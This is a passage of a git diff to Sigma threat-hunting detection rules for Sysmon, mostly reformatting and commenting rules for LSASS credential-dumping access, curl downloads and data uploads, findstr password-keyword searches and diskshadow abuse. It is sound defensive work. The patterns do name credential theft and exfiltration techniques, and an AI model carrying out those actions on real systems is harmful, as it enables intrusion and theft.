TargetFilename|contains: \AppData\Local\SquirrelTemp\ filter_main_windows_temp: - - Image|contains: :\WINDOWS\TEMP\ - - TargetFilename|contains: :\WINDOWS\TEMP\ + - Image|contains: :\WINDOWS\TEMP\ + - TargetFilename|contains: :\WINDOWS\TEMP\ filter_optional_python: Image|contains: \Python27\python.exe TargetFilename|contains: @@ -88,8 +105,8 @@ detection: Image|contains: \AppData\Local\SquirrelTemp\Update.exe TargetFilename|contains: \AppData\Local filter_main_temp_installers: - - Image|contains: \AppData\Local\Temp\ - - TargetFilename|contains: \AppData\Local\Temp\ + - Image|contains: \AppData\Local\Temp\ + - TargetFilename|contains: \AppData\Local\Temp\ filter_optional_chrome: Image|endswith: \ChromeSetup.exe TargetFilename|contains: \Google @@ -99,6 +116,7 @@ detection: TargetFilename|contains: :\Windows\assembly condition: file_event and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: + # Please contribute to FP to increase the level - Software installers - Update utilities - 32bit applications launching their 64bit versions diff --git a/sigma/sysmon/threat-hunting/file/file_event/file_event_win_vscode_tunnel_indicators.yml b/sigma/sysmon/threat-hunting/file/file_event/file_event_win_vscode_tunnel_indicators.yml index 79382edd9..6e6244014 100644 --- a/sigma/sysmon/threat-hunting/file/file_event/file_event_win_vscode_tunnel_indicators.yml +++ b/sigma/sysmon/threat-hunting/file/file_event/file_event_win_vscode_tunnel_indicators.yml @@ -1,11 +1,8 @@ title: VsCode Code Tunnel Execution File Indicator id: 9661ec9d-4439-4a7a-abed-d9be4ca43b6d status: experimental -description: 'Detects the creation of a file with the name "code_tunnel.json" which - indicate execution and usage of VsCode tunneling utility. Attackers can abuse - this functionality to establish a C2 channel - - ' +description: | + Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility. Attackers can abuse this functionality to establish a C2 channel references: - https://ipfyx.fr/post/visual-studio-code-tunnel/ - https://badoption.eu/blog/2023/01/31/code_c2.html diff --git a/sigma/sysmon/threat-hunting/file/file_event/file_event_win_webdav_tmpfile_creation.yml b/sigma/sysmon/threat-hunting/file/file_event/file_event_win_webdav_tmpfile_creation.yml index 3fcbaab58..db69b181b 100644 --- a/sigma/sysmon/threat-hunting/file/file_event/file_event_win_webdav_tmpfile_creation.yml +++ b/sigma/sysmon/threat-hunting/file/file_event/file_event_win_webdav_tmpfile_creation.yml @@ -1,8 +1,7 @@ title: WebDAV Temporary Local File Creation id: 4c55738d-72d8-490e-a2db-7969654e375f status: experimental -description: Detects the creation of WebDAV temporary files with potentially suspicious - extensions +description: Detects the creation of WebDAV temporary files with potentially suspicious extensions references: - https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html - https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462 diff --git a/sigma/sysmon/threat-hunting/image_load/image_load_dll_amsi_uncommon_process.yml b/sigma/sysmon/threat-hunting/image_load/image_load_dll_amsi_uncommon_process.yml index 6f167da7f..738860e36 100644 --- a/sigma/sysmon/threat-hunting/image_load/image_load_dll_amsi_uncommon_process.yml +++ b/sigma/sysmon/threat-hunting/image_load/image_load_dll_amsi_uncommon_process.yml @@ -44,12 +44,11 @@ detection: - :\Windows\Microsoft.NET\Framework64\ Image|endswith: \ngentask.exe filter_main_null: - Image: null + Image: filter_main_empty: Image: '' condition: image_load and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - - Legitimate third party apps installed in "ProgramData" and "AppData" might generate - some false positives. Apply additional filters accordingly + - Legitimate third party apps installed in "ProgramData" and "AppData" might generate some false positives. Apply additional filters accordingly level: low ruletype: Sigma diff --git a/sigma/sysmon/threat-hunting/image_load/image_load_dll_system_drawing_load.yml b/sigma/sysmon/threat-hunting/image_load/image_load_dll_system_drawing_load.yml index a103e90e2..3b944c19e 100644 --- a/sigma/sysmon/threat-hunting/image_load/image_load_dll_system_drawing_load.yml +++ b/sigma/sysmon/threat-hunting/image_load/image_load_dll_system_drawing_load.yml @@ -1,8 +1,7 @@ title: System Drawing DLL Load id: 666ecfc7-229d-42b8-821e-1a8f8cb7057c status: test -description: Detects processes loading "System.Drawing.ni.dll". This could be an indicator - of potential Screen Capture. +description: Detects processes loading "System.Drawing.ni.dll". This could be an indicator of potential Screen Capture. references: - https://github.com/OTRF/detection-hackathon-apt29/issues/16 - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.A.1_3B4E5808-3C71-406A-B181-17B0CE3178C9.md @@ -25,8 +24,6 @@ detection: ImageLoaded|endswith: \System.Drawing.ni.dll condition: image_load and selection falsepositives: - - False positives are very common from system and third party applications, activity - needs to be investigated. This rule is best correlated with other events to - increase the level of suspiciousness + - False positives are very common from system and third party applications, activity needs to be investigated. This rule is best correlated with other events to increase the level of suspiciousness level: low ruletype: Sigma diff --git a/sigma/sysmon/threat-hunting/image_load/image_load_office_excel_xll_load.yml b/sigma/sysmon/threat-hunting/image_load/image_load_office_excel_xll_load.yml index 5150f951f..76bd5bedf 100644 --- a/sigma/sysmon/threat-hunting/image_load/image_load_office_excel_xll_load.yml +++ b/sigma/sysmon/threat-hunting/image_load/image_load_office_excel_xll_load.yml @@ -23,7 +23,6 @@ detection: ImageLoaded|endswith: .xll condition: image_load and selection falsepositives: - - The rules is only looking for ".xll" loads. So some false positives are expected - with legitimate and allowed XLLs + - The rules is only looking for ".xll" loads. So some false positives are expected with legitimate and allowed XLLs level: low ruletype: Sigma diff --git a/sigma/sysmon/threat-hunting/network_connection/net_connection_win_dfsvc_suspicious_ip.yml b/sigma/sysmon/threat-hunting/network_connection/net_connection_win_dfsvc_suspicious_ip.yml index 1ec2a83c2..ef4f3a47d 100644 --- a/sigma/sysmon/threat-hunting/network_connection/net_connection_win_dfsvc_suspicious_ip.yml +++ b/sigma/sysmon/threat-hunting/network_connection/net_connection_win_dfsvc_suspicious_ip.yml @@ -1,8 +1,7 @@ title: Dfsvc.EXE Network Connection To Non-Local IPs id: 3c21219b-49b5-4268-bce6-c914ed50f09c status: experimental -description: Detects network connections from "dfsvc.exe" used to handled ClickOnce - applications to non-local IPs +description: Detects network connections from "dfsvc.exe" used to handled ClickOnce applications to non-local IPs references: - https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5 author: Nasreddine Bencherchali (Nextron Systems) @@ -45,15 +44,13 @@ detection: - 192.168. filter_main_local_ipv6: DestinationIp|startswith: - - ::1 - - 0:0:0:0:0:0:0:1 - - fc - - fd - - 'fe80:' + - ::1 # IPv6 loopback variant + - 0:0:0:0:0:0:0:1 # IPv6 loopback variant + - fc # private address range fc00::/7 + - fd # private address range fc00::/7 + - 'fe80:' # link-local address condition: network_connection and (selection and not 1 of filter_main_*) falsepositives: - - False positives are expected from ClickOnce manifests hosted on public IPs and - domains. Apply additional filters for the accepted IPs in your environement - as necessary + - False positives are expected from ClickOnce manifests hosted on public IPs and domains. Apply additional filters for the accepted IPs in your environement as necessary level: medium ruletype: Sigma diff --git a/sigma/sysmon/threat-hunting/pipe_created/pipe_created_sysinternals_psexec_default_pipe.yml b/sigma/sysmon/threat-hunting/pipe_created/pipe_created_sysinternals_psexec_default_pipe.yml index fcacaa8fb..fe7ad71b7 100644 --- a/sigma/sysmon/threat-hunting/pipe_created/pipe_created_sysinternals_psexec_default_pipe.yml +++ b/sigma/sysmon/threat-hunting/pipe_created/pipe_created_sysinternals_psexec_default_pipe.yml @@ -1,8 +1,8 @@ title: PsExec Default Named Pipe id: f3f3a972-f982-40ad-b63c-bca6afdfad7c related: - - id: 42c575ea-e41e-41f1-b248-8093c3e82a28 - type: derived + - id: 42c575ea-e41e-41f1-b248-8093c3e82a28 + type: derived status: test description: Detects PsExec service default pipe creation references: @@ -20,12 +20,7 @@ tags: logsource: category: pipe_created product: windows - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: diff --git a/sigma/sysmon/threat-hunting/process_access/proc_access_win_lsass_powershell_access.yml b/sigma/sysmon/threat-hunting/process_access/proc_access_win_lsass_powershell_access.yml index 5ef7c5ca5..1924062d0 100644 --- a/sigma/sysmon/threat-hunting/process_access/proc_access_win_lsass_powershell_access.yml +++ b/sigma/sysmon/threat-hunting/process_access/proc_access_win_lsass_powershell_access.yml @@ -1,13 +1,12 @@ title: Potential Credential Dumping Attempt Via PowerShell id: 0f920ebe-7aea-4c54-b202-9aa0c609cfe5 related: - - id: 3f07b9d1-2082-4c56-9277-613a621983cc - type: obsoletes - - id: fb656378-f909-47c1-8747-278bf09f4f4f - type: similar + - id: 3f07b9d1-2082-4c56-9277-613a621983cc + type: obsoletes + - id: fb656378-f909-47c1-8747-278bf09f4f4f + type: similar status: test -description: Detects a PowerShell process requesting access to "lsass.exe", which - can be indicative of potential credential dumping attempts +description: Detects a PowerShell process requesting access to "lsass.exe", which can be indicative of potential credential dumping attempts references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse author: oscd.community, Natalia Shornikova diff --git a/sigma/sysmon/threat-hunting/process_access/proc_access_win_lsass_susp_source_process.yml b/sigma/sysmon/threat-hunting/process_access/proc_access_win_lsass_susp_source_process.yml index c0729acf4..879bdd373 100644 --- a/sigma/sysmon/threat-hunting/process_access/proc_access_win_lsass_susp_source_process.yml +++ b/sigma/sysmon/threat-hunting/process_access/proc_access_win_lsass_susp_source_process.yml @@ -1,8 +1,7 @@ title: LSASS Access From Program In Potentially Suspicious Folder id: fa34b441-961a-42fa-a100-ecc28c886725 status: experimental -description: Detects process access to LSASS memory with suspicious access flags and - from a potentially suspicious folder +description: Detects process access to LSASS memory with suspicious access flags and from a potentially suspicious folder references: - https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow @@ -51,7 +50,7 @@ detection: - BA - DA - FA - - '0x14C2' + - '0x14C2' # https://github.com/b4rtik/ATPMiniDump/blob/76304f93b390af3bb66e4f451ca16562a479bdc9/ATPMiniDump/ATPMiniDump.c - FF SourceImage|contains: - \Temp\ @@ -130,14 +129,13 @@ detection: TargetImage|endswith: \winlogon.exe GrantedAccess: '0x1fffff' filter_optional_adobe_arm_helper: - SourceImage|contains: + SourceImage|contains: # Example path: 'C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\Temp\2092867405\AdobeARMHelper.exe' - :\Program Files\Common Files\Adobe\ARM\ - :\Program Files (x86)\Common Files\Adobe\ARM\ SourceImage|endswith: \AdobeARMHelper.exe GrantedAccess: '0x1410' condition: process_access and (selection and not 1 of filter_optional_*) falsepositives: - - Updaters and installers are typical false positives. Apply custom filters depending - on your environment + - Updaters and installers are typical false positives. Apply custom filters depending on your environment level: medium ruletype: Sigma diff --git a/sigma/sysmon/threat-hunting/process_access/proc_access_win_lsass_uncommon_access_flag.yml b/sigma/sysmon/threat-hunting/process_access/proc_access_win_lsass_uncommon_access_flag.yml index a0d43651b..bcd7d8978 100644 --- a/sigma/sysmon/threat-hunting/process_access/proc_access_win_lsass_uncommon_access_flag.yml +++ b/sigma/sysmon/threat-hunting/process_access/proc_access_win_lsass_uncommon_access_flag.yml @@ -1,11 +1,10 @@ title: Uncommon GrantedAccess Flags On LSASS id: 678dfc63-fefb-47a5-a04c-26bcf8cc9f65 related: - - id: 32d0d3e2-e58d-4d41-926b-18b520b2b32d - type: obsoletes + - id: 32d0d3e2-e58d-4d41-926b-18b520b2b32d + type: obsoletes status: test -description: Detects process access to LSASS memory with uncommon access flags 0x410 - and 0x01410 +description: Detects process access to LSASS memory with uncommon access flags 0x410 and 0x01410 references: - https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow @@ -31,6 +30,7 @@ detection: selection: TargetImage|endswith: \lsass.exe GrantedAccess|endswith: '10' + # Absolute paths to programs that cause false positives filter1: SourceImage: - C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe @@ -45,25 +45,31 @@ detection: - C:\WINDOWS\system32\wbem\wmiprvse.exe - C:\Windows\SysWOW64\msiexec.exe - C:\Windows\sysWOW64\wbem\wmiprvse.exe + # Windows Defender filter2: SourceImage|startswith: C:\ProgramData\Microsoft\Windows Defender\ SourceImage|endswith: \MsMpEng.exe + # Microsoft Gaming Services filter3: SourceImage|startswith: C:\Program Files\WindowsApps\ SourceImage|endswith: \GamingServices.exe + # Process Explorer filter4: SourceImage|endswith: - \PROCEXP64.EXE - \PROCEXP.EXE + # VMware Tools filter5: SourceImage|startswith: C:\ProgramData\VMware\VMware Tools\ SourceImage|endswith: \vmtoolsd.exe + # Antivirus and EDR agents filter6: SourceImage|startswith: - C:\Program Files\ - C:\Program Files (x86)\ SourceImage|contains: Antivirus filter_nextron: + # SourceImage|startswith: 'C:\Windows\Temp\asgard2-agent\' # Can be a manual THOR installation SourceImage|endswith: - \thor64.exe - \thor.exe @@ -74,6 +80,7 @@ detection: - \AppData\Local\Temp\ - \vs_bootstrapper_ GrantedAccess: '0x1410' + # Generic Filter for 0x1410 filter (caused by so many programs like DropBox updates etc.) filter_generic: SourceImage|startswith: - C:\Program Files\ diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_csc_compilation.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_csc_compilation.yml index 1d63e087d..4223fe410 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_csc_compilation.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_csc_compilation.yml @@ -1,11 +1,10 @@ title: Dynamic .NET Compilation Via Csc.EXE - Hunting id: acf2807c-805b-4042-aab9-f86b6ba9cb2b related: - - id: dcaa3f04-70c3-427a-80b4-b870d73c94c4 - type: derived + - id: dcaa3f04-70c3-427a-80b4-b870d73c94c4 + type: derived status: experimental -description: Detects execution of "csc.exe" to compile .NET code. Attackers often - leverage this to compile code on the fly and use it in other stages. +description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages. references: - https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/ - https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf @@ -27,10 +26,9 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \csc.exe - CommandLine|contains: /noconfig /fullpaths @ + CommandLine|contains: /noconfig /fullpaths @ condition: process_creation and selection falsepositives: - - Many legitimate applications make use of dynamic compilation. Use this rule - to hunt for anomalies + - Many legitimate applications make use of dynamic compilation. Use this rule to hunt for anomalies level: medium ruletype: Sigma diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_curl_download.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_curl_download.yml index d5a5e26fd..ecd5ebd1c 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_curl_download.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_curl_download.yml @@ -1,10 +1,10 @@ title: File Download Via Curl.EXE id: 9a517fca-4ba3-4629-9278-a68694697b81 related: - - id: bbeaed61-1990-4773-bf57-b81dbad7db2d - type: derived - - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 - type: derived + - id: bbeaed61-1990-4773-bf57-b81dbad7db2d # Basic curl execution + type: derived + - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 # Suspicious curl execution + type: derived status: test description: Detects file download using curl.exe references: @@ -25,18 +25,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \curl.exe - - Product: The curl executable + - Image|endswith: \curl.exe + - Product: The curl executable selection_remote: - CommandLine|contains: - - ' -O' + CommandLine|contains: + - ' -O' # covers the alias for --remote-name and --output - --remote-name - --output condition: process_creation and (all of selection_*) falsepositives: - Scripts created by developers and admins - Administrative activity - - The "\Git\usr\bin\sh.exe" process uses the "--output" flag to download a specific - file in the temp directory with the pattern "gfw-httpget-xxxxxxxx.txt " + - The "\Git\usr\bin\sh.exe" process uses the "--output" flag to download a specific file in the temp directory with the pattern "gfw-httpget-xxxxxxxx.txt " level: medium ruletype: Sigma diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_curl_execution.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_curl_execution.yml index a4e212c83..a220a75e3 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_curl_execution.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_curl_execution.yml @@ -1,11 +1,10 @@ title: Curl.EXE Execution id: bbeaed61-1990-4773-bf57-b81dbad7db2d related: - - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 - type: derived + - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 # Suspicious curl execution + type: derived status: test -description: Detects a curl process start on Windows, which could indicates a file - download from a remote location or a simple web request to a remote server +description: Detects a curl process start on Windows, which could indicates a file download from a remote location or a simple web request to a remote server references: - https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464 author: Florian Roth (Nextron Systems) @@ -24,8 +23,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \curl.exe - - Product: The curl executable + - Image|endswith: \curl.exe + - Product: The curl executable condition: process_creation and selection falsepositives: - Scripts created by developers and admins diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_curl_fileupload.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_curl_fileupload.yml index 3bf1fb201..580d2f983 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_curl_fileupload.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_curl_fileupload.yml @@ -1,8 +1,7 @@ title: Potential Data Exfiltration Via Curl.EXE id: 00bca14a-df4e-4649-9054-3f2aa676bc04 status: test -description: Detects the execution of the "curl" process with "upload" flags. Which - might indicate potential data exfiltration +description: Detects the execution of the "curl" process with "upload" flags. Which might indicate potential data exfiltration references: - https://twitter.com/d1r4c/status/1279042657508081664 - https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76 @@ -25,17 +24,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \curl.exe - - Product: The curl executable + - Image|endswith: \curl.exe + - Product: The curl executable selection_cli: - - CommandLine|contains: - - ' --form' - - ' --upload-file ' - - ' --data ' - - ' --data-' - - CommandLine|re: \s-[FTd]\s + - CommandLine|contains: + - ' --form' # Also covers the "--form-string" + - ' --upload-file ' + - ' --data ' + - ' --data-' # For flags like: "--data-ascii", "--data-binary", "--data-raw", "--data-urlencode" + - CommandLine|re: \s-[FTd]\s # We use regex to ensure a case sensitive argument detection filter_optional_localhost: - CommandLine|contains: + CommandLine|contains: - ://localhost - ://127.0.0.1 condition: process_creation and (all of selection_* and not 1 of filter_optional_*) diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_curl_useragent.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_curl_useragent.yml index 9ddae58dc..b0de5f4be 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_curl_useragent.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_curl_useragent.yml @@ -21,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_curl: - - Image|endswith: \curl.exe - - Product: The curl executable + - Image|endswith: \curl.exe + - Product: The curl executable selection_opt: - CommandLine|contains: + CommandLine|contains: - ' -A ' - ' --user-agent ' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_dfsvc_child_processes.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_dfsvc_child_processes.yml index 46cc2c23e..9f3385553 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_dfsvc_child_processes.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_dfsvc_child_processes.yml @@ -1,8 +1,7 @@ title: ClickOnce Deployment Execution - Dfsvc.EXE Child Process id: 241d52b5-eee0-49d0-ac8a-8b9c15c7221c status: experimental -description: Detects child processes of "dfsvc" which indicates a ClickOnce deployment - execution. +description: Detects child processes of "dfsvc" which indicates a ClickOnce deployment execution. references: - https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5 author: Nasreddine Bencherchali (Nextron Systems) @@ -24,7 +23,6 @@ detection: Image|endswith: \AppData\Local\Apps\2.0\ condition: process_creation and selection falsepositives: - - False positives are expected in environement leveraging ClickOnce deployments. - An initial baselining is required before using this rule in production. + - False positives are expected in environement leveraging ClickOnce deployments. An initial baselining is required before using this rule in production. level: medium ruletype: Sigma diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_diskshadow_child_process.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_diskshadow_child_process.yml index 1844dd011..72b643b70 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_diskshadow_child_process.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_diskshadow_child_process.yml @@ -1,18 +1,16 @@ title: Diskshadow Child Process Spawned id: 56b1dde8-b274-435f-a73a-fb75eb81262a related: - - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 - type: similar - - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f - type: similar - - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 - type: similar - - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 - type: similar + - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 # Diskshadow Script Mode - Execution From Potential Suspicious Location + type: similar + - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f # Diskshadow Script Mode - Uncommon Script Extension Execution + type: similar + - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 # Potentially Suspicious Child Process Of DiskShadow.EXE + type: similar + - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 # Diskshadow Script Mode Execution + type: similar status: experimental -description: Detects any child process spawning from "Diskshadow.exe". This could - be due to executing Diskshadow in interpreter mode or script mode and using the - "exec" flag to launch other applications. +description: Detects any child process spawning from "Diskshadow.exe". This could be due to executing Diskshadow in interpreter mode or script mode and using the "exec" flag to launch other applications. references: - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_diskshadow_script_mode.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_diskshadow_script_mode.yml index cd03694db..dbcb67087 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_diskshadow_script_mode.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_diskshadow_script_mode.yml @@ -1,20 +1,17 @@ title: Diskshadow Script Mode Execution id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 related: - - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 - type: similar - - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f - type: similar - - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 - type: similar - - id: 56b1dde8-b274-435f-a73a-fb75eb81262a - type: similar + - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 # Diskshadow Script Mode - Execution From Potential Suspicious Location + type: similar + - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f # Diskshadow Script Mode - Uncommon Script Extension Execution + type: similar + - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 # Potentially Suspicious Child Process Of DiskShadow.EXE + type: similar + - id: 56b1dde8-b274-435f-a73a-fb75eb81262a # Diskshadow Child Process Spawned + type: similar status: test -description: 'Detects execution of "Diskshadow.exe" in script mode using the "/s" - flag. Attackers often abuse "diskshadow" to execute scripts that deleted the shadow - copies on the systems. Investigate the content of the scripts and its location. - - ' +description: | + Detects execution of "Diskshadow.exe" in script mode using the "/s" flag. Attackers often abuse "diskshadow" to execute scripts that deleted the shadow copies on the systems. Investigate the content of the scripts and its location. references: - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration @@ -36,10 +33,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: diskshadow.exe - - Image|endswith: \diskshadow.exe + - OriginalFileName: diskshadow.exe + - Image|endswith: \diskshadow.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - '/s ' - '-s ' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_findstr_password_recon.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_findstr_password_recon.yml index 299868a38..2456da63a 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_findstr_password_recon.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_findstr_password_recon.yml @@ -1,8 +1,7 @@ title: Potential Password Reconnaissance Via Findstr.EXE id: 1a0f6f16-2099-4753-9a02-43b6ac7a1fa5 status: experimental -description: Detects command line usage of "findstr" to search for the "passwords" - keyword in a variety of different languages +description: Detects command line usage of "findstr" to search for the "passwords" keyword in a variety of different languages references: - https://steflan-security.com/windows-privilege-escalation-credential-harvesting/ - https://adsecurity.org/?p=2288 @@ -21,19 +20,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \findstr.exe - - OriginalFileName: FINDSTR.EXE + - Image|endswith: \findstr.exe + - OriginalFileName: FINDSTR.EXE selection_cli: - CommandLine|contains: - - "contrase\xF1a" - - "has\u0142o" - - heslo - - parola - - passe - - passw - - senha - - senord - - "\u5BC6\u78BC" + CommandLine|contains: + - contraseña # Spanish + - hasło # Polish + - heslo # Czech + - parola # Italian + - passe # French + - passw # German, English + - senha # Portuguese + - senord # Swedish + - 密碼 # Cantonese condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_net_quic.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_net_quic.yml index 9a7e7d7c5..69844d6d2 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_net_quic.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_net_quic.yml @@ -1,11 +1,10 @@ title: SMB over QUIC Via Net.EXE id: 2238d337-42fb-4971-9a68-63570f2aede4 related: - - id: 6df07c3b-8456-4f8b-87bb-fe31ec964cae - type: similar + - id: 6df07c3b-8456-4f8b-87bb-fe31ec964cae + type: similar status: experimental -description: Detects the mounting of Windows SMB shares over QUIC, which can be an - unexpected event in some enterprise environments. +description: Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments. references: - https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1570/T1570.md - https://www.trustedsec.com/blog/making-smb-accessible-with-ntlmquic/ @@ -24,14 +23,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - Image|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains: /TRANSPORT:QUIC + CommandLine|contains: /TRANSPORT:QUIC condition: process_creation and (all of selection_*) falsepositives: - Administrative activity diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_office_svchost_parent.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_office_svchost_parent.yml index 9e99eb934..f31e26ff1 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_office_svchost_parent.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_office_svchost_parent.yml @@ -1,14 +1,9 @@ title: Suspicious New Instance Of An Office COM Object id: 9bdaf1e9-fdef-443b-8081-4341b74a7e28 status: test -description: 'Detects an svchost process spawning an instance of an office application. - This happens when the initial word application creates an instance of one of the - Office COM objects such as ''Word.Application'', ''Excel.Application'', etc. - - This can be used by malicious actors to create malicious Office documents with - macros on the fly. (See vba2clr project in the references) - - ' +description: | + Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc. + This can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references) references: - 